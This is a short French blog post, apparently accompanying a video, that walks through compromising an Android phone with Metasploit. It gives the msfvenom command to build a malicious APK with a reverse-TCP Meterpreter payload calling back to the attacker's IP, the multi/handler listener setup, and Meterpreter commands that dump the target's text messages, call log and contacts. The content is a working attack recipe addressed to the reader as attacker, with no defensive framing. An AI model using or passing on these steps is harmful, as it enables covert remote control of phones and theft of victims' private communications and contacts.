Compromettre la sécurité d'un téléphone Android avec Metasploit


Dans ce nouvel article, il sera question de faire une démo sur comment un téléphone Android peut être compromis en utilisant Metasploit.

Vous trouverez une vidéo en bas de l'article
Les lignes de commandes utilisées dans la vidéo :

Création du payload 

msfvenom -p android/meterpreter/reverse_tcp lhost=votre_adresse_ip lport=4444  >/root/Desktop/nom_du_payload.apk    (n'oubliez pas l'extension.apk)

Metasploit
msfconsole
use exploits/multi/handler
set lhost votre_adresse_ipset lport 4444
set paylaod android/meterpreter/reverse_tcp
exploit

Les commandes Meterpreter
check root   cette ligne de commande vous permettra de savoir si l'appareil de la cible est routé
dump_sms  cette ligne de commande est pour extraire les sms du téléphone de la cible dans un fichier texte 
dump_calllog cette ligne de commande est pour extraire le log des appels entrant et sortant dans un fichier texte
dump_contacts cette ligne de commande vous permettra d'extraire les contacts de la cible dans un fichier texte 


Plus récente Plus ancienne